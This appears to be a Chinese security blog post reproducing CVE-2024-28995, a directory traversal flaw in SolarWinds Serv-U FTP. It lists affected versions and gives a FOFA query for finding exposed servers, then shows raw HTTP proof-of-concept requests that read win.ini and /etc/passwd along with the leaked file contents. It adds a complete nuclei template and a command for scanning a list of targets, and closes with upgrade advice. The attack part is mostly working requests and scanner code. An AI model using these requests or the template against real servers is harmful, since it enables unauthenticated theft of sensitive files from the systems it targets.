CVE-2024-28995 漏洞复现

admin 2024年6月17日15:10:23评论44 views字数 3698阅读12分19秒阅读模式

使

01

漏洞名称

SolarWinds Serv-U FTP 目录遍历文件读取漏洞
注意:该漏洞EXP已公开传播,漏洞利用成本极低,建议尽快修复。

02

漏洞影响

SolarWinds Serv-U < 15.4.2 HF 2版本

03

漏洞描述

SolarWinds Serv-U FTP 是一款由SolarWinds公司开发的FTP服务器软件,它提供了一种安全、可靠的方式来管理和传输文件。2024年6月,官方发布安全更新,修复CVE-2024-28995 SolarWinds Serv-U FTP 目录遍历文件读取漏洞,攻击者无需登陆即可构造恶意请求读取系统上文件,造成敏感信息泄漏。

04

FOFA搜索语句
app="SolarWinds-Serv-U-FTP"

CVE-2024-28995 漏洞复现

05

漏洞复现

windows环境POC数据包如下

GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应内容如下

HTTP/1.0 200 OKContent-Length: 92Accept-Encoding: deflateCache-Control: must-revalidate, privateConnection: closeDate: Mon, 17 Jun 2024 02:44:10 GMTExpires: -1Last-Modified: Thu, 22 Aug 2013 13:25:41 GMTReferrer-Policy: same-originServer: Serv-U/15.4.1.128Strict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffX-Frame-Options: sameoriginX-Permitted-Cross-Domain-Policies: noneX-Same-Domain: 1X-Xss-Protection: 1; mode=block; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1

linux环境POC数据包如下

GET /?InternalDir=........etc&InternalFile=passwd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应数据包如下

HTTP/1.0 200 OKContent-Length: 1350Accept-Encoding: deflateCache-Control: no-cache,no-store,max-age=0,must-revalidateConnection: closeContent-Type: text/plainDate: Mon, 17 Jun 2024 02:45:44 GMTExpires: -1Pragma: no-cacheReferrer-Policy: same-originServer: Serv-U/15.4.2.126Set-Cookie: CsrfToken=; expires=Thu, 01-Jan-1970 00:00:01 GMT; SameSite=Strict; path=/;  httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffX-Frame-Options: sameoriginX-Permitted-Cross-Domain-Policies: noneX-Same-Domain: 1X-Xss-Protection: 1; mode=blockroot:*:19856:0:99999:7:::daemon:*:19856:0:99999:7:::bin:*:19856:0:99999:7:::sys:*:19856:0:99999:7:::sync:*:19856:0:99999:7:::games:*:19856:0:99999:7:::man:*:19856:0:99999:7:::lp:*:19856:0:99999:7:::mail:*:19856:0:99999:7:::news:*:19856:0:99999:7:::uucp:*:19856:0:99999:7:::proxy:*:19856:0:99999:7:::www-data:*:19856:0:99999:7:::backup:*:19856:0:99999:7:::list:*:19856:0:99999:7:::irc:*:19856:0:99999:7:::_apt:*:19856:0:99999:7:::nobody:*:19856:0:99999:7:::root@79ea29878d8e:/# cat /etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologin

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: CVE-2024-28995info:  name: SolarWinds Serv-U FTP 目录遍历文件读取漏洞  author: fgz  severity: high  description: |    SolarWinds Serv-U FTP 是一款由SolarWinds公司开发的FTP服务器软件,它提供了一种安全、可靠的方式来管理和传输文件。2024年6月,官方发布安全更新,修复CVE-2024-28995 SolarWinds Serv-U FTP 目录遍历文件读取漏洞,攻击者无需登陆即可构造恶意请求读取系统上文件,造成敏感信息泄漏。  metadata:    verified: true    fofa-query: server="Serv-U"  tags: cve,cve2024http:  - method: GET    path:      - "{{BaseURL}}/?InternalDir=/../../../../windows&InternalFile=win.ini"      - "{{BaseURL}}/?InternalDir=\..\..\..\..\etc&InternalFile=passwd"    stop-at-first-match: true    matchers:      - type: dsl        dsl:          - "contains(body, '; for 16-bit app support') || contains(body, '/root:/bin/bash')"

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-28995.yaml -l data1.txt

CVE-2024-28995 漏洞复现

07

修复建议

升级至 SolarWinds Serv-U 15.4.2 HF 2 及其以上版本。

原文始发于微信公众号(AI与网安):CVE-2024-28995 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月17日15:10:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-28995 漏洞复现http://cn-sec.com/archives/2856188.html

发表评论

匿名网友 填写信息